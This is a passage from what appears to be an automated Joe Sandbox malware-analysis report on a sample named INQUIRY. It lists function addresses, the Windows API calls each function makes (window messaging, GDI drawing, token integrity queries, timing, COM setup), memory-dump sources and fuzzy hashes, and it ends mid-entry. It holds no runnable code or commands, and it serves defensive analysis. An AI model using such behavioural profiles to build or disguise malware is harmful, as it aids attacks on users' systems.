                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A68A30
                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00A68ADA
                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A68AE2
                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00A68AF0
                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A68AF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: c4a48bb04c4d466dd1f1857b85d535b941e09b2653d991ba31c04799197b590f
                                                                                              • Instruction ID: 9ae5f26560c9e3ae68e574d84c0ff1ad9a0694ff9742334586d9ccb025b45040
                                                                                              • Opcode Fuzzy Hash: c4a48bb04c4d466dd1f1857b85d535b941e09b2653d991ba31c04799197b590f
                                                                                              • Instruction Fuzzy Hash: FF31CE71600219EFDF14CFA8D94CA9E3BB9EB14315F11832AF925EA2D0CBB49954DB90
                                                                                              Function 00A6B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00A6B204
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A6B221
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A6B259
                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A6B27F
                                                                                              • _wcsstr.LIBCMT ref: 00A6B289
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 3902887630-0
                                                                                              • Opcode ID: c2263100324c4bfe6cb165bdd3b2b89a98a5a5f8a41e165b5801e42c01a1ce87
                                                                                              • Instruction ID: 6f2a2076a6d93e1490dd4905818cf4f0a52e69779708def39d78abacdb7b222b
                                                                                              • Opcode Fuzzy Hash: c2263100324c4bfe6cb165bdd3b2b89a98a5a5f8a41e165b5801e42c01a1ce87
                                                                                              • Instruction Fuzzy Hash: 74212272204240BFEB259B799C19EBF7BFCDF49720F00413AF904CA1A1EF618C8192A0
                                                                                              Function 00A9B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9B192
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A9B1B7
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A9B1CF
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00A9B1F8
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A80E90,00000000), ref: 00A9B216
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2294984445-0
                                                                                              • Opcode ID: 7d325d78150b041139f2c7e44ffa533d8aa0ffbe403c8898b88b19fca932ffff
                                                                                              • Instruction ID: 01614cc5d3fe8ba7ed74afa696728ae8e58b0e21e116b210eaf30e0cc386b5a6
                                                                                              • Opcode Fuzzy Hash: 7d325d78150b041139f2c7e44ffa533d8aa0ffbe403c8898b88b19fca932ffff
                                                                                              • Instruction Fuzzy Hash: 49218071B20255AFCF109F78AD44A6A37E4EB05321F214729F932D71E0E73098219BA0
                                                                                              Function 00A69307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A69320
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A69352
                                                                                              • __itow.LIBCMT ref: 00A6936A
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A69392
                                                                                              • __itow.LIBCMT ref: 00A693A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2983881199-0
                                                                                              • Opcode ID: 4697b2a6770bdfa28ca6367dcf0a4858dbcb7ebd52b097d5f591ce44bc260a00
                                                                                              • Instruction ID: 8e8616494bee54f95943969a127c1f0a9a445f49fd2e95f3e526eaf191651b16
                                                                                              • Opcode Fuzzy Hash: 4697b2a6770bdfa28ca6367dcf0a4858dbcb7ebd52b097d5f591ce44bc260a00
                                                                                              • Instruction Fuzzy Hash: FC21D431704208BBDB10ABA48D89EEF7BBDEB48710F045029FA05DF2D1DAB0CD569791
                                                                                              Function 00A85A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00A85A6E
                                                                                              • GetForegroundWindow.USER32 ref: 00A85A85
                                                                                              • GetDC.USER32(00000000), ref: 00A85AC1
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00A85ACD
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00A85B08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              • Opcode ID: 8d994cdf11826d26d066bd7963828ca13f7730ae5ec5a51878108276bf7a94d0
                                                                                              • Instruction ID: e7d7c4c2496d05b563451674dabc4a5699a44dffb83193aab1f95fdba5bb4670
                                                                                              • Opcode Fuzzy Hash: 8d994cdf11826d26d066bd7963828ca13f7730ae5ec5a51878108276bf7a94d0
                                                                                              • Instruction Fuzzy Hash: 02218435A00204AFDB14EFA5DD88A9AB7E9EF48350F14C479F909D7351CE70AD41CB90
                                                                                              Function 00A112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A1134D
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A1135C
                                                                                              • BeginPath.GDI32(?), ref: 00A11373
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A1139C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: 2d8323ab5bdc3689d7388da4717bcb613ef1e626fd9bac4c55741ba404fb0f3e
                                                                                              • Instruction ID: e2b482acd5b45cccbab417764ef8337e92658e5f528327c4833e19a3039b7292
                                                                                              • Opcode Fuzzy Hash: 2d8323ab5bdc3689d7388da4717bcb613ef1e626fd9bac4c55741ba404fb0f3e
                                                                                              • Instruction Fuzzy Hash: 7C215930D01608EFDB10DFA5EC047AD7BA8EB00322F184227E9229A1B4D7709892EF90
                                                                                              Function 00A6BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: b9c4d19e376c57b1da537674bff25d2f8f9cc45ac0892e829e62443a490eff02
                                                                                              • Instruction ID: e0254b59461a504b9e20235ed35accb60a8d8e0ac5f0d0c008a0005a5c96ae09
                                                                                              • Opcode Fuzzy Hash: b9c4d19e376c57b1da537674bff25d2f8f9cc45ac0892e829e62443a490eff02
                                                                                              • Instruction Fuzzy Hash: 2401B5B26101157BD3046B196E42FFBB37CEE55398F044421FE15D7282EB61DF6082B0
                                                                                              Function 00A74A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A74ABA
                                                                                              • __beginthreadex.LIBCMT ref: 00A74AD8
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00A74AED
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A74B03
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A74B0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 3824534824-0
                                                                                              • Opcode ID: 9b1edbba254f5e7bd43eebdb73b4872f0ee0b46d63b028b38192969e2c04268f
                                                                                              • Instruction ID: 6f945ee23c6e170eb074849b3657d3b9715487a57e6b5834d8cf727e61e9764b
                                                                                              • Opcode Fuzzy Hash: 9b1edbba254f5e7bd43eebdb73b4872f0ee0b46d63b028b38192969e2c04268f
                                                                                              • Instruction Fuzzy Hash: 6C11E576A09214BFCB01CBF89C08ADB7BACAB49320F148266F919D3250DB718D0587A0
                                                                                              Function 00A68202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A6821E
                                                                                              • GetLastError.KERNEL32(?,00A67CE2,?,?,?), ref: 00A68228
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00A67CE2,?,?,?), ref: 00A68237
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00A67CE2,?,?,?), ref: 00A6823E
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A68255
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: c0faeb3366a0476c3f7e89b38101e0f31b4b44160adac0767ae5241b9cb2a504
                                                                                              • Instruction ID: d0271b949fc63039451a6964e8fa4242fe79627d5625c18e28a9716ca41bc826
                                                                                              • Opcode Fuzzy Hash: c0faeb3366a0476c3f7e89b38101e0f31b4b44160adac0767ae5241b9cb2a504
                                                                                              • Instruction Fuzzy Hash: 8C016DB1304204BFDB208FB5DC48DAB7BBCEF8A755B60062AF919C2220DE318C41CA60
                                                                                              Function 00A6710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?,?,00A67455), ref: 00A67127
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67142
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67150
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?), ref: 00A67160
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A6716C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: 66d54d75c45c23c43332f1104c9f16b15e25ee32d110e7ce18d74d8a2f92d7d5
                                                                                              • Instruction ID: 8200801e2d438a3e226a84e85f37c951ae44c143b8e788b351857f644dc4c5a5
                                                                                              • Opcode Fuzzy Hash: 66d54d75c45c23c43332f1104c9f16b15e25ee32d110e7ce18d74d8a2f92d7d5
                                                                                              • Instruction Fuzzy Hash: 5C017CB2621204AFDB118FA4DC44AAE7BBDEB45795F144266FD04D2220DB71DD429BA0
                                                                                              Function 00A75244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A75260
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A7526E
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A75276
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A75280
                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 55d91d42a5dbba68a49a242d6e293c32156b6601267c056cbcbb1bbc013f611c
                                                                                              • Instruction ID: 64591c7c2261043d0fff6a4a5804f5111207f4e1d4bc4f0be205006162cc58a2
                                                                                              • Opcode Fuzzy Hash: 55d91d42a5dbba68a49a242d6e293c32156b6601267c056cbcbb1bbc013f611c
                                                                                              • Instruction Fuzzy Hash: 6C013931D01A19DBCF00EFE5DC485EDBB78BB09711F508156EA49F2142DF70555187E5
                                                                                              Function 00A6810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A68121
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A6812B
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A6813A
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68141
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68157
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: ba2bb62a9cdb9bf310b352010a66d864ecff4bf0ed6081b37ce57de5b1956449
                                                                                              • Instruction ID: 0c47e4f50e077610a961399b22c8de0f7f1a505646898fde2b5ad94b05f9e0be
                                                                                              • Opcode Fuzzy Hash: ba2bb62a9cdb9bf310b352010a66d864ecff4bf0ed6081b37ce57de5b1956449
                                                                                              • Instruction Fuzzy Hash: 43F04F71300304AFEB214FA5EC99E6B3BACEF4A758B100226FA45C6160DE659942DA60
                                                                                              Function 00A6C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A6C1F7
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A6C20E
                                                                                              • MessageBeep.USER32(00000000), ref: 00A6C226
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00A6C242
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A6C25C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: 0ca1b8fb33130b38b1dc323153803335bd34e544b71200a88083dad10110e87a
                                                                                              • Instruction ID: 87f7166c59062f4108a321b5a82783ffbae659587c0928c3b33f6afd4885ad94
                                                                                              • Opcode Fuzzy Hash: 0ca1b8fb33130b38b1dc323153803335bd34e544b71200a88083dad10110e87a
                                                                                              • Instruction Fuzzy Hash: 6A01DB306043049BEB20ABB0DD5EFE67778FF00705F04026AFA82D14E0DBF469558B90
                                                                                              Function 00A113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EndPath.GDI32(?), ref: 00A113BF
                                                                                              • StrokeAndFillPath.GDI32(?,?,00A4B888,00000000,?), ref: 00A113DB
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A113EE
                                                                                              • DeleteObject.GDI32 ref: 00A11401
                                                                                              • StrokePath.GDI32(?), ref: 00A1141C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: 377208b9bfb04f93a81b0d55e0385f0ebd5e5807ba035173d5149c1da5c36b7c
                                                                                              • Instruction ID: ff1f3db66a3089081f5319900900ff1964f583a13c2c05f1576dfd755a2f96cc
                                                                                              • Opcode Fuzzy Hash: 377208b9bfb04f93a81b0d55e0385f0ebd5e5807ba035173d5149c1da5c36b7c
                                                                                              • Instruction Fuzzy Hash: 4BF0CD30505708DFDB11DFA6EC4C79C3BA8AB01726F188226E53A890F1D7315596FF50
                                                                                              Function 00A7C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A7C432
                                                                                              • CoCreateInstance.OLE32(00AA2D6C,00000000,00000001,00AA2BDC,?), ref: 00A7C44A
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • CoUninitialize.OLE32 ref: 00A7C6B7
                                                                                              Strings
                                                                                              Memory Dump Source
